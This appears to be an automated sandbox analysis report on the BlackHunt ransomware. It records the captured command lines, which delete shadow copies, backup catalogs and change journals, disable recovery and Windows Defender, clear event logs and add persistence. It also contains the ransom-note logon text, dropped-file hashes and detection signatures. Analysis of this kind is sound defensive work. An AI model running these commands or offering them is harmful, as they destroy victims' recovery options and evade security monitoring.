C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
C:\Windows\system32\schtasks.exe
SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
C:\Windows\system32\fsutil.exe
fsutil.exe usn deletejournal /D C:
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D F:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D M:\
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D C:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Application
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\schtasks.exe
SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\taskkill.exe
taskkill /IM mshta.exe /f
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f
C:\Windows\system32\fsutil.exe
fsutil.exe usn deletejournal /D C:
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Setup
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security /e:false
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl System
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
C:\Windows\system32\notepad.exe
notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
C:\ProgramData\#BlackHunt_Private.key
| MD5 | 868458415e80d77143a5d7deed140fef |
| SHA1 | bd873b33c1ea3ef1c8fcaba583fd42e6bf0c6cb2 |
| SHA256 | 6f49a210dd80cdd7b9ddba7b078a4b2c7b3b40dbf6f75ec7048688d2e3124724 |
| SHA512 | 903b8d5eddf8fc6aaf7f2d163114c54c9b86fb957150abfb3beca44eef23dadc63990afa592b3f092f0235315c663c6e651a9800d7ff79e74699f7ab48dc50eb |
C:\ProgramData\#BlackHunt_ReadMe.hta
| MD5 | e309e86aa475bf9ab6d9ec368d40fe5a |
| SHA1 | 3db62b6572867604cd091a6c518c4458308d002e |
| SHA256 | 39c0d064e4419607fa2a3b96691440bb9613e7cf28be9476dbe6c644f07a13d2 |
| SHA512 | 5d89c38896f51b2e05f3f0a209054cefe770823b929f4ed9c1275df9aaef58b44dae482a3483c295098423a0652672774797ab869dc67967b31af3dfdb151583 |
C:\ProgramData\#BlackHunt_ReadMe.txt
| MD5 | 88d5b995bf93732281a24ffa8c40ab5c |
| SHA1 | ed0d8cb268e450141673338e131ff2bd97f8b23c |
| SHA256 | 69ffdd2db3a73f5a41ba2d4b25d27661112a80f2d403112b11f53454ad5fb5c1 |
| SHA512 | ea7a88abc7583e6e50d08b8711fd93bf4d79137e68922c614c9e3ed47fdc0bfae113acd6693ffdbf24dd8c966e667ccee9bb3d958ef28fcbb4aceb9db3ef071e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-06 00:48
Reported
2024-11-06 00:50
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Deletes NTFS Change Journal
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\fsutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\fsutil.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Clears Windows event logs
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (3360) files with added filename extension
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Disables Task Manager via registry modification
Disables use of System Restore points
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | C:\Windows\system32\reg.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Enumerates connected drives
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\security\java.security | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\bun.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_it_135x40.svg | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\mai\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\he-il\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\css\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\mr\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\it-it\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\gu.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_listview_18.svg | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
